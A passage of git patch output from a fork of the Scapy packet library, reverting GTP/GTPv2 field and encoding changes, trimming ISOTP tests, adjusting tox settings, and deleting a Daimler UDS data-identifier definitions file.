m2i(self, pkt, val): if left == 0xf: ret.append(TBCD_TO_ASCII[right:right + 1]) else: - ret += [ - TBCD_TO_ASCII[right:right + 1], - TBCD_TO_ASCII[left:left + 1] - ] + ret += [TBCD_TO_ASCII[right:right + 1], TBCD_TO_ASCII[left:left + 1]] # noqa: E501 return b"".join(ret) def i2m(self, pkt, val): - if not isinstance(val, bytes): - val = bytes_encode(val) - ret_string = b"" + val = str(val) + ret_string = "" for i in range(0, len(val), 2): tmp = val[i:i + 2] if len(tmp) == 2: - ret_string += chb(int(tmp[::-1], 16)) + ret_string += chr(int(tmp[1] + tmp[0], 16)) else: - ret_string += chb(int(b"F" + tmp[:1], 16)) + ret_string += chr(int("F" + tmp[0], 16)) return ret_string @@ -499,9 +495,7 @@ def m2i(self, pkt, s): return s def i2m(self, pkt, s): - if not isinstance(s, bytes): - s = bytes_encode(s) - s = b"".join(chb(len(x)) + x for x in s.split(b".")) + s = b"".join(chb(len(x)) + x for x in s.split(".")) return s diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index c7927b86e20..9b664ae0fc6 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -25,8 +25,7 @@ from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, IntField, IPField, LongField, PacketField, \ PacketListField, ShortEnumField, ShortField, StrFixedLenField, \ - StrLenField, ThreeBytesField, XBitField, XIntField, XShortField, \ - FieldLenField + StrLenField, ThreeBytesField, XBitField, XIntField, XShortField from scapy.data import IANA_ENTERPRISE_NUMBERS from scapy.packet import bind_layers, Packet, Raw from scapy.volatile import RandIP, RandShort @@ -629,7 +628,7 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - ShortField("length", 6), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -642,7 +641,7 @@ class IE_Cause(gtp.IE_Base): class IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - ShortField("length", 5), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("restart_counter", 0)] @@ -651,8 +650,7 @@ class IE_RecoveryRestart(gtp.IE_Base): class IE_APN(gtp.IE_Base): name = "IE APN" fields_desc = [ByteEnumField("ietype", 71, IEType), - FieldLenField("length", None, length_of="APN", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.APNStrLenField("APN", "internet", @@ -662,7 +660,7 @@ class IE_APN(gtp.IE_Base): class IE_AMBR(gtp.IE_Base): name = "IE AMBR" fields_desc = [ByteEnumField("ietype", 72, IEType), - ShortField("length", 12), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("AMBR_Uplink", 0), @@ -672,8 +670,7 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - FieldLenField("length", None, length_of="digits", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("digits", "33123456789", diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 4240a8753c1..558fd2e5eb7 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -53,17 +53,16 @@ a = IP(raw(IP()/UDP()/GTP_U_Header()/PPP())) assert isinstance(a[GTP_U_Header].payload, PPP) = GTPCreatePDPContextRequest(), basic instantiation -gtp = IP(src="127.0.0.1", dst="127.0.0.1")/UDP(dport=2123, sport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() +gtp = IP(src="127.0.0.1")/UDP(dport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() gtp.dport == 2123 and gtp.teid == 2807 and len(gtp.IE_list) == 5 = GTPCreatePDPContextRequest(), basic dissection +~ random_weird_py3 random.seed(0x2807) rg = raw(gtp) -rg -assert rg in [ - b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x99\xce0\x10\x00'\x00\x00\n\xf7\x10\x12\x05\xf7(\x14\x0b\x85\x00\x04\xb7\xd0\xbf \x85\x00\x04\xe2\xb8\x88\x19\x87\x00\x0ffOTLcIukpXKxV0Z", - b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007n\xb20\x10\x00'\x00\x00\n\xf7\x10\x91\x9f\xbc\xaa\x14\x07\x85\x00\x04<\x7f\x87\x14\x85\x00\x04\xbcU\x14\xcb\x87\x00\x0f9Co27Fbj65eKHyQ", -] +print(rg) +assert rg in [b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x1a\xc30\x10\x00'\x00\x00\n\xf7\x10\xd6\xd2\xf6\xd8\x14\x0b\x85\x00\x04\xa3\xad\x98\xfa\x85\x00\x04F\\`\xd6\x87\x00\x0fBCD5lPP8N2u8h9l", + b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\xd3\xf20\x10\x00'\x00\x00\n\xf7\x107m\xaeV\x14\x08\x85\x00\x04\x83\x92K\xa3\x85\x00\x04\xb7\xb2\xff\xd0\x87\x00\x0foTrnmM9erqfhqpV"] = GTPV1UpdatePDPContextRequest(), dissect h = "3333333333332222222222228100a38408004588006800000000fd1134820a2a00010a2a00024aa5084b005408bb32120044ed99aea9386f0000100000530514058500040a2a00018500040a2a000187000c0213921f739680fe74f2ffff94000130970001019800080112f41004d204d29900024000b6000101" diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 83caf074228..931756bd973 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -43,7 +43,6 @@ ie.IMSI == b"2080112345670000" = IE_IMSI, basic instantiation ie = IE_IMSI(ietype='IMSI', length=8, IMSI='2080112345670000') ie.ietype == 1 and ie.IMSI == b'2080112345670000' -assert bytes(ie) == b'\x01\x00\x08\x00\x02\x08\x112Tv\x00\x00' = IE_Cause, dissection h = "3333333333332222222222228100838408004588004a00000000fd1193160a2a00010a2a0002084b824600366a744823002a45e679235ea151000200020010005d001800490001006c0200020010005700090081000010927f000002558d3b69" @@ -86,7 +85,6 @@ ie.APN == b'aaaaaaaaaaaaaaaaaaaaaaaaa' = IE_APN, basic instantiation ie = IE_APN(ietype='APN', length=26, APN='aaaaaaaaaaaaaaaaaaaaaaaaa') ie.ietype == 71 and ie.APN == b'aaaaaaaaaaaaaaaaaaaaaaaaa' -assert bytes(ie) == b'G\x00\x1a\x00\x19aaaaaaaaaaaaaaaaaaaaaaaaa' = IE_AMBR, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" @@ -138,7 +136,6 @@ ie.digits == b'111111111111' = IE_MSISDN, basic instantiation ie = IE_MSISDN(ietype='MSISDN', length=6, digits='111111111111') ie.ietype == 76 and ie.digits == b'111111111111' -assert bytes(ie) == b'L\x00\x06\x00\x11\x11\x11\x11\x11\x11' = IE_Indication, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 712bdacfc34..7f3a2bd2e4c 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -151,76 +151,12 @@ assert(p.data == b"") assert(p.src is None and p.dst is None and p.exsrc is None and p.exdst is None) assert(bytes(p) == b"") -= Creation of a simple ISOTP packet with src += Creation of a simple ISOTP packet with source p = ISOTP(b"eee", src=0x241) assert(p.src == 0x241) assert(p.data == b"eee") assert(bytes(p) == b"eee") -= Creation of a simple ISOTP packet with exsrc -p = ISOTP(b"eee", exsrc=0x41) -assert(p.exsrc == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with dst -p = ISOTP(b"eee", dst=0x241) -assert(p.dst == 0x241) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with exdst -p = ISOTP(b"eee", exdst=0x41) -assert(p.exdst == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with src, dst, exsrc, exdst -p = ISOTP(b"eee", src=1, dst=2, exsrc=3, exdst=4) -assert(p.dst == 2) -assert(p.exdst == 4) -assert(p.src == 1) -assert(p.exsrc == 3) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with src validation error -ex = False -try: - p = ISOTP(b"eee", src=0x1000000000, dst=2, exsrc=3, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - -= Creation of a simple ISOTP packet with dst validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=0x20000000000, exsrc=3, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - -= Creation of a simple ISOTP packet with exsrc validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=3000, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - - -= Creation of a simple ISOTP packet with exdst validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=30, exdst=400) -except Scapy_Exception: - ex = True - -assert ex - + ISOTPFrame related checks = Build a packet with extended addressing @@ -422,16 +358,6 @@ assert(fragment.flags == 0) assert(fragment.length == 5) assert(fragment.reserved == 0) -= Fragment a 4 bytes long ISOTP message extended -fragments = ISOTP(b"data", dst=0x1fff0000).fragment() -assert(len(fragments) == 1) -assert(isinstance(fragments[0], CAN)) -fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x04data") -assert(fragment.length == 5) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) - = Fragment a 7 bytes long ISOTP message fragments = ISOTP(b"abcdefg").fragment() assert(len(fragments) == 1) @@ -484,22 +410,6 @@ isotp.show() assert(isotp.data == b"test") assert(isotp.dst == 0x641) -= Defragment non ISOTP message -fragments = [CAN(identifier=0x641, data=b"\xa4test")] -isotp = ISOTP.defragment(fragments) -assert isotp is None - -= Defragment exception -fragments = [] -ex = False -try: - isotp = ISOTP.defragment(fragments) - isotp.show() -except Scapy_Exception: - ex = True - -assert ex - = Defragment an ISOTP message composed of multiple CAN frames fragments = [ CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), @@ -1078,61 +988,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s cans.close() -= Send two-frame ISOTP message with bs -cans = new_can_socket(iface0) -acker_ready = threading.Event() -def acker(): - acks = new_can_socket(iface0) - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) - acks.close() - -Thread(target=acker).start() -acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 20 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - -cans.close() - - -= Send two-frame ISOTP message with ST -cans = new_can_socket(iface0) -acker_ready = threading.Event() -def acker(): - acks = new_can_socket(iface0) - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) - acks.close() - -Thread(target=acker).start() -acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 10")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - -cans.close() - = Receive a single frame ISOTP message with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: cans = new_can_socket(iface0) diff --git a/tox.ini b/tox.ini index 2d7f7ebb817..d15df8b66cb 100644 --- a/tox.ini +++ b/tox.ini @@ -62,7 +62,6 @@ commands = bash -c "rm -rf /tmp/can-utils /tmp/can-isotp" lsmod sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} - coverage combine [testenv] @@ -142,7 +141,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs,scapy/contrib/automotive/daimler/definitions.py" scapy/ doc/ test/ .github/ [testenv:twine] @@ -167,6 +166,7 @@ commands = flake8 scapy/ ignore = E731, W504 per-file-ignores = scapy/all.py:F403,F401 + scapy/contrib/automotive/daimler/definitions.py:E501 scapy/contrib/automotive/obd/obd.py:F405,F403 scapy/contrib/automotive/obd/pid/pids.py:F405,F403 scapy/contrib/automotive/obd/scanner.py:F405,F403,E501 From 3ebd3988d77a60b8976b1fd9c5b0585d39d29ddc Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 23 Feb 2020 13:31:53 -0500 Subject: [PATCH 0006/1632] Revert "Revert "pull from secdev"" --- scapy/contrib/automotive/daimler/__init__.py | 11 - .../contrib/automotive/daimler/definitions.py | 3398 ----------------- scapy/contrib/gtp.py | 20 +- scapy/contrib/gtp_v2.py | 15 +- test/contrib/gtp.uts | 11 +- test/contrib/gtp_v2.uts | 3 + test/contrib/isotp.uts | 147 +- tox.ini | 4 +- 8 files changed, 179 insertions(+), 3430 deletions(-) delete mode 100644 scapy/contrib/automotive/daimler/__init__.py delete mode 100644 scapy/contrib/automotive/daimler/definitions.py diff --git a/scapy/contrib/automotive/daimler/__init__.py b/scapy/contrib/automotive/daimler/__init__.py deleted file mode 100644 index f06000ab15a..00000000000 --- a/scapy/contrib/automotive/daimler/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Nils Weiss -# This program is published under a GPLv2 license - -# scapy.contrib.status = skip - -""" -Package of contrib automotive bmw specific modules -that have to be loaded explicitly. -""" diff --git a/scapy/contrib/automotive/daimler/definitions.py b/scapy/contrib/automotive/daimler/definitions.py deleted file mode 100644 index 9209f37d6d4..00000000000 --- a/scapy/contrib/automotive/daimler/definitions.py +++ /dev/null @@ -1,3398 +0,0 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Nils Weiss -# This program is published under a GPLv2 license - -# scapy.contrib.description = Daimler specific definitions for UDS -# scapy.contrib.status = skip - - -from scapy.contrib.automotive.uds import UDS_RDBI - -UDS_RDBI.dataIdentifiers[0x0000] = "Read all stored UID from Kleer-Module" -UDS_RDBI.dataIdentifiers[0x0002] = "Freeze Frame Diagnostic Trouble Code" -UDS_RDBI.dataIdentifiers[0x0003] = "Kalibrierung" -UDS_RDBI.dataIdentifiers[0x0004] = "Calculated Load Value" -UDS_RDBI.dataIdentifiers[0x0005] = "Engine Coolant Temperature" -UDS_RDBI.dataIdentifiers[0x0006] = "Status FIN-Verriegelung" -UDS_RDBI.dataIdentifiers[0x0007] = "Service Sensorjustage Fortschrittsanzeige" # or Zustand ELV Fahrt Verriegelung 1 ELV Verrieglung -UDS_RDBI.dataIdentifiers[0x0008] = "Status Sensor Justage " -UDS_RDBI.dataIdentifiers[0x0009] = "EOL Sensorjustage Fortschrittsanzeige" # or Kraftstoffdruck Sollwert Sollwert Aktuell, Kraftstoffdruck Sollwert -UDS_RDBI.dataIdentifiers[0x000a] = "AD Werte Batteriespannung" -UDS_RDBI.dataIdentifiers[0x000b] = "EKP Motorspannung PRES Spannung" # or Batteriespannung PRES Spannung, Temperatursensor PRES Temperatur, Batteriespannung, KSD Sensor Signal PRES Kraftstoffdruck -UDS_RDBI.dataIdentifiers[0x000c] = "Engine Speed" # or Status Werte EKP Lauf, Status Werte, Status Werte EC Motor Stop Reason, Status Werte Kl 15 PRES aus ein 1Bit, Status Werte EKP Lauf PRES aus ein 1Bit -UDS_RDBI.dataIdentifiers[0x000d] = "Connected devices" -UDS_RDBI.dataIdentifiers[0x000f] = "IntakeAirTemperature" -UDS_RDBI.dataIdentifiers[0x0010] = "Keypad test" -UDS_RDBI.dataIdentifiers[0x0011] = "Present DVD Region Code" -UDS_RDBI.dataIdentifiers[0x0012] = "DVD Remaining Changes" # or manufacturing data container data container -UDS_RDBI.dataIdentifiers[0x0015] = "Status Drehfalle Fahrertuer Fahrertuer" -UDS_RDBI.dataIdentifiers[0x0016] = "Keypad test" -UDS_RDBI.dataIdentifiers[0x001a] = "DPM" -UDS_RDBI.dataIdentifiers[0x001c] = "Status Werte Entwicklung EC Motor Stop Reason" # or Status Werte Entwicklung EKP Lauf -UDS_RDBI.dataIdentifiers[0x0020] = "Lernwerte Eigenlenkgradient" -UDS_RDBI.dataIdentifiers[0x0021] = "Distance With Malfunction Indicator Lamp On" -UDS_RDBI.dataIdentifiers[0x0024] = "02 global variant coding" -UDS_RDBI.dataIdentifiers[0x0025] = "DCX Engineering Traceability" # or Motortyp Motortyp, Motortyp Lesen, @36076 -UDS_RDBI.dataIdentifiers[0x0026] = "Buswachhalterereignisse Anzahl Buswachhalter" # or Buswachhalterereignisse Lesen -UDS_RDBI.dataIdentifiers[0x0027] = "02 global variant coding 2" -UDS_RDBI.dataIdentifiers[0x0028] = "Versorgungsspannung Ubat" -UDS_RDBI.dataIdentifiers[0x0029] = "Versorgungsspannung Notbatterie Ubat" -UDS_RDBI.dataIdentifiers[0x0030] = "Warm-Up Cycles Since Code Clear" -UDS_RDBI.dataIdentifiers[0x0031] = "Distance Since Code Clear" -UDS_RDBI.dataIdentifiers[0x0033] = "Barometric Pressure" -UDS_RDBI.dataIdentifiers[0x0034] = "Zentralverriegelung Zentralverriegelung" -UDS_RDBI.dataIdentifiers[0x0040] = "Lernwerte Veigen" -UDS_RDBI.dataIdentifiers[0x0042] = "Control Module Voltage" -UDS_RDBI.dataIdentifiers[0x0043] = "DC-Block" -UDS_RDBI.dataIdentifiers[0x0046] = "Ambient Air Temperature" -UDS_RDBI.dataIdentifiers[0x0049] = "Accelarator Pedal Position" -UDS_RDBI.dataIdentifiers[0x0051] = "Read firmware from Kleer-Module" -UDS_RDBI.dataIdentifiers[0x0080] = "DC Block DC Block" -UDS_RDBI.dataIdentifiers[0x0081] = "Letzte Nachricht zur ELV Daten zur ELV" -UDS_RDBI.dataIdentifiers[0x0082] = "Letzte Nachricht von der ELV Daten der ELV" -UDS_RDBI.dataIdentifiers[0x008b] = "Konfiguration Buswachhaltermonitoring Abblendlicht Status beruecksichtigen" -UDS_RDBI.dataIdentifiers[0x008c] = "Buswachhalter Ereignisse" -UDS_RDBI.dataIdentifiers[0x00a0] = "MEC Manufacturers Enable" -UDS_RDBI.dataIdentifiers[0x00b4] = "Manufacturing Traceability Character" -UDS_RDBI.dataIdentifiers[0x00d1] = "Environment Data" -UDS_RDBI.dataIdentifiers[0x00e0] = "Musterstand" -UDS_RDBI.dataIdentifiers[0x0100] = "Reprogramming Attempt Counter" -UDS_RDBI.dataIdentifiers[0x0101] = "ECU Logging Data" # or Zugriff Fehlerspeicher DTC Lese Zaehler, Copy of Historical Interrogation Record DTC Read Counter -UDS_RDBI.dataIdentifiers[0x0102] = "Diagnostic Trace Memory Data Byte" -UDS_RDBI.dataIdentifiers[0x0103] = "VIN Odometer Counter Schreiben" -UDS_RDBI.dataIdentifiers[0x0104] = "VIN Odometer Counter Limit Schreiben" -UDS_RDBI.dataIdentifiers[0x0105] = "Usage Histogram" -UDS_RDBI.dataIdentifiers[0x0106] = "Common Event Ring Memory" -UDS_RDBI.dataIdentifiers[0x0107] = "Response on Event light activation state" -UDS_RDBI.dataIdentifiers[0x0108] = "Verbauliste" -UDS_RDBI.dataIdentifiers[0x010a] = "Vehicle Odometer in Low Resolution" -UDS_RDBI.dataIdentifiers[0x010b] = "Adjust ISO 15765 2 Block Size and STmin Parameter Block Size Value as defined in ISO 15765" -UDS_RDBI.dataIdentifiers[0x010c] = "Read Odometer value from Bus" -UDS_RDBI.dataIdentifiers[0x010d] = "Read Used EVC Config 460 VEHICLES FOR CANADA ADDITIONAL PARTS" -UDS_RDBI.dataIdentifiers[0x010f] = "Read LIN Slope" -UDS_RDBI.dataIdentifiers[0x0110] = "Dezentrales Power Management - Chassis CAN Infos" -UDS_RDBI.dataIdentifiers[0x0111] = "Dezentrales Power Management - Powertrain CAN Infos" -UDS_RDBI.dataIdentifiers[0x0112] = "Dezentrales Power Management - PT Sensor CAN Infos" -UDS_RDBI.dataIdentifiers[0x0115] = "EEProm lesen" -UDS_RDBI.dataIdentifiers[0x011d] = "Kalibrierung IMotOffset" -UDS_RDBI.dataIdentifiers[0x011e] = "EOL Pruefstempel EOL Pruefbyte" -UDS_RDBI.dataIdentifiers[0x011f] = "ICT Pruefstempel Hardware Version" -UDS_RDBI.dataIdentifiers[0x0120] = "Reprogramming Resume Information" -UDS_RDBI.dataIdentifiers[0x012d] = "Engine Style" -UDS_RDBI.dataIdentifiers[0x0130] = "Activate Partial Networking" -UDS_RDBI.dataIdentifiers[0x0131] = "Plausibilisierung Kraftstoffdrucksensor Referenzdaten Data locked" -UDS_RDBI.dataIdentifiers[0x0132] = "Operating Time of Last Ignition Cycle" -UDS_RDBI.dataIdentifiers[0x0133] = "Operating Time" -UDS_RDBI.dataIdentifiers[0x0134] = "SAR Trigger Counter" -UDS_RDBI.dataIdentifiers[0x0135] = "Number of SAR Write Cycles" -UDS_RDBI.dataIdentifiers[0x0136] = "Configure SAR Trigger Events" -UDS_RDBI.dataIdentifiers[0x0137] = "Enable SAR Memory Overwrite" -UDS_RDBI.dataIdentifiers[0x0138] = "Customer Settings" -UDS_RDBI.dataIdentifiers[0x0141] = "Zaehler Sychronisierungsverlust Odo" -UDS_RDBI.dataIdentifiers[0x0142] = "Availability Data" -UDS_RDBI.dataIdentifiers[0x0160] = "Ethernet Link Quality" -UDS_RDBI.dataIdentifiers[0x0161] = "Ethernet Switch Counters" -UDS_RDBI.dataIdentifiers[0x0162] = "Ethernet Drop Counters" -UDS_RDBI.dataIdentifiers[0x0163] = "Ethernet MIB Counters" -UDS_RDBI.dataIdentifiers[0x0164] = "Ethernet Link Statistics" -UDS_RDBI.dataIdentifiers[0x0165] = "Ethernet Link" -UDS_RDBI.dataIdentifiers[0x0166] = "Ethernet Port" -UDS_RDBI.dataIdentifiers[0x0167] = "Ethernet Wake up Line" -UDS_RDBI.dataIdentifiers[0x0168] = "Ethernet Wake up Line Activation" -UDS_RDBI.dataIdentifiers[0x0169] = "Ethernet Wake up Line Pulse Counter" -UDS_RDBI.dataIdentifiers[0x016a] = "Ethernet Transceiver Identification" -UDS_RDBI.dataIdentifiers[0x016b] = "Ethernet Switch Identification" -UDS_RDBI.dataIdentifiers[0x016c] = "Write Ethernet Port Mirroring Configuration" -UDS_RDBI.dataIdentifiers[0x016d] = "Read Ethernet Port Mirroring Configuration" -UDS_RDBI.dataIdentifiers[0x016e] = "Ethernet Port Mirroring" -UDS_RDBI.dataIdentifiers[0x016f] = "Ethernet MAC and IP Addresses" -UDS_RDBI.dataIdentifiers[0x0170] = "Ethernet Switch Address Table" -UDS_RDBI.dataIdentifiers[0x0171] = "Ethernet Hardware Configuration" -UDS_RDBI.dataIdentifiers[0x0173] = "Ethernet Switch Configuration" -UDS_RDBI.dataIdentifiers[0x0174] = "Ethernet Link Training Duration" -UDS_RDBI.dataIdentifiers[0x0175] = "Ethernet ENV Data" -UDS_RDBI.dataIdentifiers[0x0180] = "Root CA Certificate" -UDS_RDBI.dataIdentifiers[0x0181] = "Backend CA Certificate" -UDS_RDBI.dataIdentifiers[0x0182] = "Backend CA Certificate Identification" -UDS_RDBI.dataIdentifiers[0x0183] = "ECU Certificate" -UDS_RDBI.dataIdentifiers[0x0184] = "Diagnostic Authentication Certificate Identification" -UDS_RDBI.dataIdentifiers[0x0185] = "Access Control List Version" -UDS_RDBI.dataIdentifiers[0x0186] = "Secured System Date and Time" -UDS_RDBI.dataIdentifiers[0x0187] = "Security Event Log" -UDS_RDBI.dataIdentifiers[0x0188] = "SecOC PDU Data IDs and Key Checksum" -UDS_RDBI.dataIdentifiers[0x0189] = "SecOC Vehicle Shared Secret Hash" -UDS_RDBI.dataIdentifiers[0x018a] = "SecOC Local TickCount" -UDS_RDBI.dataIdentifiers[0x018b] = "SecOc ENV Data" -UDS_RDBI.dataIdentifiers[0x018c] = "Ladezustand" -UDS_RDBI.dataIdentifiers[0x0190] = "Security Event Log Current Counter Values" -UDS_RDBI.dataIdentifiers[0x01fa] = "Status Spiegelabklappung" -UDS_RDBI.dataIdentifiers[0x0202] = "Currents" # or DependencyInformation, BDMS Mode Write Entwicklung, WS input voltage, Drehfalle Fahrertuer -UDS_RDBI.dataIdentifiers[0x0203] = "Engine" # or Hardware Terminals, Keyless Go, HW terminals, Keyless Go KG vorhanden, Kl 50 input voltage -UDS_RDBI.dataIdentifiers[0x0204] = "Gearbox" # or PN48 Battery Switch State, Kl 30Z voltage -UDS_RDBI.dataIdentifiers[0x0205] = "Config" # or ST voltage -UDS_RDBI.dataIdentifiers[0x0206] = "Kombi" -UDS_RDBI.dataIdentifiers[0x0207] = "DataStatus" # or Torque -UDS_RDBI.dataIdentifiers[0x0208] = "Blinker" -UDS_RDBI.dataIdentifiers[0x0209] = "CAN ECU State" # or Status EOL Sensorjustag" -UDS_RDBI.dataIdentifiers[0x020a] = "ErrorBytes" # or Entry Conditions RUN, Access Conditions RUN, Drehfallen -UDS_RDBI.dataIdentifiers[0x020b] = "Fail Conditions Position Sensor Offset Learning" # or Fail Conditions ROL, BsdData -UDS_RDBI.dataIdentifiers[0x020c] = "Zentralverriegelung Letzte Aussenentriegelungsursache" # or SensorPos, CVN calculation, Predriver Shutdownpathtest Isolation Information -UDS_RDBI.dataIdentifiers[0x020d] = "SMA" -UDS_RDBI.dataIdentifiers[0x020e] = "Status Transportmodus Status Transportmodus" -UDS_RDBI.dataIdentifiers[0x0210] = "Letzte Nachricht von der ELV Read SSP Daten" # or Lernwerte Drehrate, 0210 Amplifier Supply Voltage Signal Error -UDS_RDBI.dataIdentifiers[0x0211] = "Regelparameter" -UDS_RDBI.dataIdentifiers[0x0212] = "Konfiguration Produktion" # or Klemmenstatus Read Klemme 15, ASIC Type -UDS_RDBI.dataIdentifiers[0x0213] = "Filterparameter des Algorithmus" # or Asic AssemblyLotID SYSSER0 -UDS_RDBI.dataIdentifiers[0x0215] = "Thermoschutzparameter des Algorithmus Zaehler" -UDS_RDBI.dataIdentifiers[0x0217] = "Funktionsstatus Hexdumps NV" -UDS_RDBI.dataIdentifiers[0x0218] = "Thermoschutzparameter des Algorithmus Erhoehungswerte" -UDS_RDBI.dataIdentifiers[0x0219] = "DidAt Konfigurationskennung" -UDS_RDBI.dataIdentifiers[0x0220] = "0220 Central Components Supply Voltage Signal Error" # or Transmitter IDs -UDS_RDBI.dataIdentifiers[0x0221] = "LeftFront Tx Id" -UDS_RDBI.dataIdentifiers[0x0222] = "RightFront Tx Id" -UDS_RDBI.dataIdentifiers[0x0223] = "Tuerzusatzsicherung Zustand Tuerzusatzsicherung" # or Rightrear Tx Id -UDS_RDBI.dataIdentifiers[0x0224] = "LeftRear Tx Id" -UDS_RDBI.dataIdentifiers[0x0225] = "Fahrzeuginformationen" -UDS_RDBI.dataIdentifiers[0x0226] = "Defaultwerte I/O Control" -UDS_RDBI.dataIdentifiers[0x0228] = "EOL-Tester Informationen Antrieb" -UDS_RDBI.dataIdentifiers[0x022c] = "Drehsperre" -UDS_RDBI.dataIdentifiers[0x0230] = "0230 External 5V Supply Voltage 